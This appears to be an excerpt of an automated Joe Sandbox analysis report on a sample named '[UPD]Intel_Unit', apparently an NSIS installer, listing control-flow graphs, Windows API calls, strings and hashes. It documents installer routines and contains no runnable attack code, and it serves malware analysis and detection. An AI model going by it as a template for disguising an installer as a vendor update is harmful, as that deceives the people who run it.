                                                                                                                                                                                                              control_flow_graph 653 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 656 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 653->656 657 4035d7-4035dc 653->657 665 403615 656->665 666 4036fc-40370a call 4032d2 656->666 658 4037b6-4037ba 657->658 668 40361a-403631 665->668 672 403710-403713 666->672 673 4037c5-4037ca 666->673 670 403633 668->670 671 403635-403637 call 403336 668->671 670->671 677 40363c-40363e 671->677 675 403715-40372d call 403368 call 403336 672->675 676 40373f-403769 GlobalAlloc call 403368 call 40337f 672->676 673->658 675->673 703 403733-403739 675->703 676->673 701 40376b-40377c 676->701 679 403644-40364b 677->679 680 4037bd-4037c4 call 4032d2 677->680 685 4036c7-4036cb 679->685 686 40364d-403661 call 405e0c 679->686 680->673 689 4036d5-4036db 685->689 690 4036cd-4036d4 call 4032d2 685->690 686->689 700 403663-40366a 686->700 697 4036ea-4036f4 689->697 698 4036dd-4036e7 call 407281 689->698 690->689 697->668 702 4036fa 697->702 698->697 700->689 706 40366c-403673 700->706 707 403784-403787 701->707 708 40377e 701->708 702->666 703->673 703->676 706->689 709 403675-40367c 706->709 710 40378a-403792 707->710 708->707 709->689 711 40367e-403685 709->711 710->710 712 403794-4037af SetFilePointer call 405e0c 710->712 711->689 713 403687-4036a7 711->713 716 4037b4 712->716 713->673 715 4036ad-4036b1 713->715 717 4036b3-4036b7 715->717 718 4036b9-4036c1 715->718 716->658 717->702 717->718 718->689 719 4036c3-4036c5 718->719 719->689
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                                                                                                • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Null, xrefs: 0040367E
                                                                                                                                                                                                              • Inst, xrefs: 0040366C
                                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                                                                                              • soft, xrefs: 00403675
                                                                                                                                                                                                              • Error launching installer, xrefs: 004035D7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                              • API String ID: 4283519449-527102705
                                                                                                                                                                                                              • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                                              • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 720 40337f-403396 721 403398 720->721 722 40339f-4033a7 720->722 721->722 723 4033a9 722->723 724 4033ae-4033b3 722->724 723->724 725 4033c3-4033d0 call 403336 724->725 726 4033b5-4033be call 403368 724->726 730 4033d2 725->730 731 4033da-4033e1 725->731 726->725 732 4033d4-4033d5 730->732 733 4033e7-403407 GetTickCount call 4072f2 731->733 734 403518-40351a 731->734 735 403539-40353d 732->735 746 403536 733->746 748 40340d-403415 733->748 736 40351c-40351f 734->736 737 40357f-403583 734->737 739 403521 736->739 740 403524-40352d call 403336 736->740 741 403540-403546 737->741 742 403585 737->742 739->740 740->730 755 403533 740->755 744 403548 741->744 745 40354b-403559 call 403336 741->745 742->746 744->745 745->730 757 40355f-403572 WriteFile 745->757 746->735 751 403417 748->751 752 40341a-403428 call 403336 748->752 751->752 752->730 758 40342a-403433 752->758 755->746 759 403511-403513 757->759 760 403574-403577 757->760 761 403439-403456 call 407312 758->761 759->732 760->759 762 403579-40357c 760->762 765 40350a-40350c 761->765 766 40345c-403473 GetTickCount 761->766 762->737 765->732 767 403475-40347d 766->767 768 4034be-4034c2 766->768 769 403485-4034b6 MulDiv wsprintfW call 404f72 767->769 770 40347f-403483 767->770 771 4034c4-4034c7 768->771 772 4034ff-403502 768->772 778 4034bb 769->778 770->768 770->769 775 4034e7-4034ed 771->775 776 4034c9-4034db WriteFile 771->776 772->748 773 403508 772->773 773->746 777 4034f3-4034f7 775->777 776->759 779 4034dd-4034e0 776->779 777->761 781 4034fd 777->781 778->768 779->759 780 4034e2-4034e5 779->780 780->777 781->746
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403464
                                                                                                                                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 004034A4
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                              • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                                                                                                                              • API String ID: 651206458-1535804072
                                                                                                                                                                                                              • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                                              • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 782 404f72-404f85 783 405042-405044 782->783 784 404f8b-404f9e 782->784 785 404fa0-404fa4 call 406805 784->785 786 404fa9-404fb5 lstrlenW 784->786 785->786 788 404fd2-404fd6 786->788 789 404fb7-404fc7 lstrlenW 786->789 792 404fe5-404fe9 788->792 793 404fd8-404fdf SetWindowTextW 788->793 790 405040-405041 789->790 791 404fc9-404fcd lstrcatW 789->791 790->783 791->788 794 404feb-40502d SendMessageW * 3 792->794 795 40502f-405031 792->795 793->792 794->795 795->790 796 405033-405038 795->796 796->790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                              • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                              • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                              • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2740478559-0
                                                                                                                                                                                                              • Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                                              • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 797 401eb9-401ec4 798 401f24-401f26 797->798 799 401ec6-401ec9 797->799 800 401f53-401f7b GlobalAlloc call 406805 798->800 801 401f28-401f2a 798->801 802 401ed5-401ee3 call 4062a3 799->802 803 401ecb-401ecf 799->803 816 4030e3-4030f2 800->816 817 402387-40238d GlobalFree 800->817 805 401f3c-401f4e call 406009 801->805 806 401f2c-401f36 call 4062a3 801->806 814 401ee4-402702 call 406805 802->814 803->799 807 401ed1-401ed3 803->807 805->817 806->805 807->802 813 401ef7-402e50 call 406009 * 3 807->813 813->816 829 402708-40270e 814->829 817->816 829->816
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                              • GlobalFree.KERNELBASE(006A3120), ref: 00402387
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                              • String ID: 1j$ChapterFilmeJokeHeadquartersMistake$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                                                                                              • API String ID: 1459762280-4004034782
                                                                                                                                                                                                              • Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                                              • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 832 4022fd-402325 call 40145c GetFileVersionInfoSizeW 835 4030e3-4030f2 832->835 836 40232b-402339 GlobalAlloc 832->836 836->835 837 40233f-40234e GetFileVersionInfoW 836->837 839 402350-402367 VerQueryValueW 837->839 840 402384-40238d GlobalFree 837->840 839->840 843 402369-402381 call 405f51 * 2 839->843 840->835 843->840
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                              • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                              • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                              • GlobalFree.KERNELBASE(006A3120), ref: 00402387
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3376005127-0
                                                                                                                                                                                                              • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                              • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 848 402b23-402b37 GlobalAlloc 849 402b39-402b49 call 401446 848->849 850 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 848->850 855 402b70-402b73 849->855 850->855 856 402b93 855->856 857 402b75-402b8d call 405f6a WriteFile 855->857 858 4030e3-4030f2 856->858 857->856 862 402384-40238d GlobalFree 857->862 862->858
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2568930968-0
                                                                                                                                                                                                              • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                              • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 865 402713-40273b call 406009 * 2 870 402746-402749 865->870 871 40273d-402743 call 40145c 865->871 873 402755-402758 870->873 874 40274b-402752 call 40145c 870->874 871->870 875 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 873->875 876 40275a-402761 call 40145c 873->876 874->873 876->875
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ChapterFilmeJokeHeadquartersMistake, xrefs: 00402770
                                                                                                                                                                                                              • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                                                                                                                                                              • <RM>, xrefs: 00402713
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                              • String ID: <RM>$ChapterFilmeJokeHeadquartersMistake$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                              • API String ID: 247603264-3133829785
                                                                                                                                                                                                              • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                                              • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 886 405047-405065 OleInitialize call 403daf 888 40506a-40506c 886->888 889 40509b-4050b2 call 403daf OleUninitialize 888->889 890 40506e 888->890 891 405071-405077 890->891 893 4050b5-4050c0 call 4062a3 891->893 894 405079-405093 call 4062a3 call 40139d 891->894 900 4050c1-4050c9 893->900 894->900 904 405095 894->904 900->891 902 4050cb 900->902 902->889 904->889
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                                                                                                • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
